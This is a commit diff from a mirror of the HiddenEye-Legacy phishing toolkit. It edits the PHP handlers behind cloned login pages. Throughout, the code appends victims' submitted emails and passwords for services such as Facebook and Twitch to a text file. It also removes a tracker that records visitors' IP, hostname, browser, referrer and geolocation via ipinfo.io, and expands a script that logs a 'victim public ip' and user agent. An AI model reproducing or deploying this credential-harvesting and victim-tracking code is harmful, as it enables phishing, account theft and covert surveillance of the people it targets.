mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
commit
34820b96d4
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
|
@ -1,38 +0,0 @@
|
||||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle) {
|
||||
$string = 'INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
. $QUERY_STRING . ' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
. $_SERVER['REMOTE_ADDR'] . ' [2]HOSTNAME = ' // ip address
|
||||
. $hostname . ' [3]BROWSER & SYSTEM = ' // hostname
|
||||
. $_SERVER['HTTP_USER_AGENT'] . ' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
. $_SERVER['HTTP_REFERER'] . ' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
. $details->loc . ' [6]ISP = ' // latitude, longitude
|
||||
. $details->org . ' [7]CITY = ' // internet service provider
|
||||
. $details->city . ' [8]STATE = ' // city
|
||||
. $details->region . ' [9]COUNTRY = ' // state
|
||||
. $details->country . ' [10]DATE & TIME = ' // country
|
||||
. date("D dS M,Y h:i a") . '________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
. "\n";
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['Email'] . " [PASS]: " . $_POST['Passwd'] . "\n", FILE_APPEND);
|
||||
|
@ -12,15 +12,18 @@ else
|
||||
{
|
||||
$ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
|
||||
}
|
||||
$useragent = " User-Agent: ";
|
||||
$browser = $_SERVER['HTTP_USER_AGENT'];
|
||||
|
||||
|
||||
$file = 'ip.txt'; //this is the file to which the IP address will be written; name it your way.
|
||||
$victim = "victim public ip: ";
|
||||
$fp = fopen($file, 'a');
|
||||
|
||||
fwrite($fp, $victim);
|
||||
|
||||
//$fp = fopen($file, 'a');
|
||||
|
||||
fwrite($fp, $ipaddress);
|
||||
fwrite($fp, $useragent);
|
||||
fwrite($fp, $browser);
|
||||
|
||||
|
||||
fclose($fp);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['UsernameForm'] . " [PASS]: " . $_POST['PasswordForm'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[Twitch-EMAIL]: " . $_POST['twitch_user'] . " [Twitch-PASS]: " . $_POST['twitch_pass'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[FB-EMAIL]: " . $_POST['fb_email'] . " [FB-PASS]: " . $_POST['fb_pass'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['usernameOrEmail'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
|
@ -1,5 +1,4 @@
|
||||
<?php
|
||||
include 'base.php';
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
|
Loading…
x
Reference in New Issue
Block a user